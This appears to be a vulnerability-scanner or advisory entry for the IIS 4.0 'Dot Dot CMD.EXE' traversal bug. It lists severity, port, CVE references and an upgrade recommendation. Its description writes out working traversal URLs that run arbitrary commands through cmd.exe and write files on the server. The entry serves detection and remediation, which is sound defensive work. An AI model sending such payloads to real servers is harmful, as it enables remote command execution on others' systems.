| Field | Value |
| --- | --- |
| VID | 22033 |
| Severity | 40 |
| Port | 80, ... |
| Protocol | TCP |
| Class | WWW |
| Detailed Description | Older versions of IIS 4.0 have a bug known as the "Dot Dot CMD.EXE" bug. A server with this vulnerability allows arbitrary commands to be executed on the server from the outside by way of this bug. It can be tested as follows: http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command or http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>FULL_PATH\filename or http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>>FULL_PATH\filename or http://[domain_name]/scripts/../../cmd.exe/?%2FC+echo+"hello,+World">c:\temp\hello.bat |
| Recommendation | Stop the system immediately and install the latest version. |
| Related URL | CVE-1999-0874 (CVE) |
| Related URL | 307 (SecurityFocus) |
| Related URL | 2281 (ISS) |